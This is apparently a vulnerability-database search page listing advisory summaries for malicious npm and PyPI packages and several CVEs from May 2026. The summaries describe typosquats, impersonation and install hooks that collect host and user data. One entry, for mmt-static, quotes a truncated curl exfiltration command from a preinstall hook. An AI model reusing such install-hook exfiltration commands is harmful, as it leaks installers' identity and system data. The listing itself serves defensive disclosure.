Lucene search
K

16020 matches found

OSV
OSV
added 2026/05/25 1:48 p.m.6 views

MAL-2026-4589 Malicious code in itc-actors-api (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 22687e1f7601dde1753d3775925d62d040892631394937e56e9b9fba74fb85c6 The package contains callback.js which collects host identifiers and user information os.hostname, os.userInfo, os.platform, cwd and transmits them v...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/25 10:36 a.m.12 views

Malicious code in muaddib-scanner (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c8eea5d3ed390c4c82b5bfa89ac220f1d424fcaebe70fe71bbbe3bce66f0f48f package.json declares "loadash": "^1.0.0" as a runtime dependency. loadash is a well-known typosquat of lodash and is never required or imported...

5.8AI score
Exploits0References1
OSV
OSV
added 2026/05/25 10:36 a.m.9 views

MAL-2026-4616 Malicious code in muaddib-scanner (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c8eea5d3ed390c4c82b5bfa89ac220f1d424fcaebe70fe71bbbe3bce66f0f48f package.json declares "loadash": "^1.0.0" as a runtime dependency. loadash is a well-known typosquat of lodash and is never required or imported...

5.8AI score
Exploits0References1
OSV
OSV
added 2026/05/25 10:31 a.m.5 views

MAL-2026-4631 Malicious code in opentiny-react (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 70307cffed06951bdb7b961e7846e3b3e0ba660b75ddca0b4fa11366ab94dc6d The package opentiny-react reproduces the source, README, and CHANGELOG of the legitimate @tinymce/tinymce-react integration verbatim under a...

6AI score
Exploits0References1
vulnersOsv
vulnersOsv
added 2026/05/24 7:39 a.m.5 views

org.webjars.npm:coreui__coreui (=4.2.1), org.webjars.npm:css-loader (>=2.1.0 <=6.7.2) +19 more potentially affected by CVE-2026-9358 via org.webjars.npm:postcss-selector-parser (>=4.0.0-rc.1 <=7.1.0)

org.webjars.npm:postcss-selector-parser MAVEN version =4.0.0-rc.1, =2.1.0, =3.1.0, =7.0.1, =4.0.2, =2.0.6, =2.1.0, =4.1.2, =6.2.0 and more Source cves: CVE-2026-9358 Source advisory: SNYK:JAVA-ORGWEBJARSNPM-16873883...

5.3CVSS5.4AI score0.00325EPSS
Exploits0
OSV
OSV
added 2026/05/23 7:14 p.m.7 views

MAL-2026-4750 Malicious code in fastapi (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a753fd569a7bb908b7cdf82fe0228dc0e24dcc253b67993af5dd5c30b61f4411 This release of fastapi 0.136.3 modifies pyproject.toml and PKG-INFO to add an undocumented dependency 'fastar=0.9.0' to the...

6.2AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/23 7:14 p.m.17 views

Malicious code in fastapi (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a753fd569a7bb908b7cdf82fe0228dc0e24dcc253b67993af5dd5c30b61f4411 This release of fastapi 0.136.3 modifies pyproject.toml and PKG-INFO to add an undocumented dependency 'fastar=0.9.0' to the...

6.2AI score
Exploits0References1
OSV
OSV
added 2026/05/23 6:19 p.m.9 views

MAL-2026-4638 Malicious code in pewter-constantstest (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 050b19d8dad7c8c1a626c953493c23b375e434128f38950625f82b0fb244eabe On npm install, the preinstall script callback.js collects the installer's hostname, OS username, current working directory, npm registry...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/23 10:27 a.m.9 views

Malicious code in @onerjs/inspector (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 08c3c6c201db840a5576941656934704b0932abe72527c5e85b969fd90ad0ccd Package name, version 8.52.2, README, homepage and repository all impersonate @babylonjs/inspector. The shipped code is a 700-byte UMD wrapper that...

6AI score
Exploits0References1
OSV
OSV
added 2026/05/23 4:1 a.m.6 views

MAL-2026-4410 Malicious code in @onerjs/addons (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a7d3b8a435a56ca78d7a2f4ca7077b8a96f968d29e32dd01580fdf01cee442f5 Package is published as @onerjs/addons but ships a verbatim copy of @babylonjs/addons source while declaring Babylon.js identity in its metadata:...

6AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/23 4:1 a.m.12 views

Malicious code in @onerjs/addons (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a7d3b8a435a56ca78d7a2f4ca7077b8a96f968d29e32dd01580fdf01cee442f5 Package is published as @onerjs/addons but ships a verbatim copy of @babylonjs/addons source while declaring Babylon.js identity in its metadata:...

6AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/23 2:17 a.m.13 views

Malicious code in dds-js-idl-types (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 68e8941c301603919022f1d67d311d576d5d5efcac7ed7cb0d3526cb71e829d6 On npm install, the package's postinstall.js runs whoami and reads os.hostname, os.platform, the current working directory, and CI-related environmen...

5.8AI score
Exploits0References2
Fedora
Fedora
added 2026/05/23 12:58 a.m.24 views

[SECURITY] Fedora 44 Update: composer-2.9.8-1.fc44

Composer helps you declare, manage and install dependencies of PHP projects, ensuring you have the right stack everywhere. Documentation: https://getcomposer.org/doc/...

5.8AI score
Exploits0
vulnersOsv
vulnersOsv
added 2026/05/23 12:0 a.m.6 views

ai.aletyx.kogito:aletyx-kogito-ai-addons-springboot-adhoc-subprocess (>=0.1.0 <=0.2.0), ai.aletyx.kogito:aletyx-kogito-ai-addons-springboot-adhoc-subprocess-storage-jpa (>=0.1.0 <=0.2.0) +59 more potentially affected by CVE-2026-41863 via org.springframework.ai:spring-ai-anthropic (>=1.0.0-M5 <=1.1.6)

org.springframework.ai:spring-ai-anthropic MAVEN version =1.0.0-M5, =0.1.0, =0.1.0, =1.0.0, =1.0.0, =1.0.0, =1.0.0, =1.0.24, =1.0.27, =1.0.0, =1.0.0, =1.0.0, =1.0.0, =1.2.4, =1.2.4, =1.2.6 and more Source cves: CVE-2026-41863 Source advisory: SNYK:JAVA-ORGSPRINGFRAMEWORKAI-16873885...

6.5CVSS5.7AI score0.00398EPSS
Exploits0
OSV
OSV
added 2026/05/22 7:52 p.m.10 views

MAL-2026-4639 Malicious code in pg-expense-example (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d1d939ad3f0e8e9754bf3562f06692713a76d5c0f18ac13c956f9cb199ed0fbf On require/load, index.js unconditionally collects host identifiers hostname, username, platform, arch, cwd, pid and sends them as URL query paramete...

5.9AI score
Exploits0References1
OSV
OSV
added 2026/05/22 7:36 p.m.7 views

MAL-2026-4632 Malicious code in orca-website (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c52f7fe46d56cb45880942f5266494a2654d9d330914a6c3c99f02045eacd1dc On require/import, index.js collects host identifiers os.hostname, os.userInfo.username, os.platform, os.arch, process.cwd, process.pid, timestamp an...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/22 6:36 p.m.12 views

Malicious code in express-enrouten-async (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f944bc544f9368e58a223e76e462ddec4ba325c728a233100182706ad8f0ae0e Package name mimics the legitimate express-enrouten route-discovery library, but the shipped index.js only hardcodes two demo routes rather than...

6.1AI score
Exploits0References2
OSV
OSV
added 2026/05/22 6:36 p.m.7 views

MAL-2026-4556 Malicious code in express-enrouten-async (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f944bc544f9368e58a223e76e462ddec4ba325c728a233100182706ad8f0ae0e Package name mimics the legitimate express-enrouten route-discovery library, but the shipped index.js only hardcodes two demo routes rather than...

6.1AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/22 6:12 p.m.12 views

Malicious code in mmt-static (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 755d0176c106903bf2baaf14d0bb4df611bb719c2a7b0615e9b4487eadee1300 On npm install, the package's preinstall lifecycle hook executes node index.js && curl --data-urlencode "info=$hostname && whoami"...

5.8AI score
Exploits0References2
Snyk
Snyk
added 2026/05/22 5:42 p.m.8 views

Improper Authentication

Overview Affected versions of this package are vulnerable to Improper Authentication via the ToASCII and ToUnicode functions. An attacker can bypass hostname validation by submitting Punycode-encoded labels that decode to ASCII-only labels, potentially leading to privilege escalation in...

9.6CVSS5.6AI score0.00478EPSS
Exploits0References2
Rows per page
Query Builder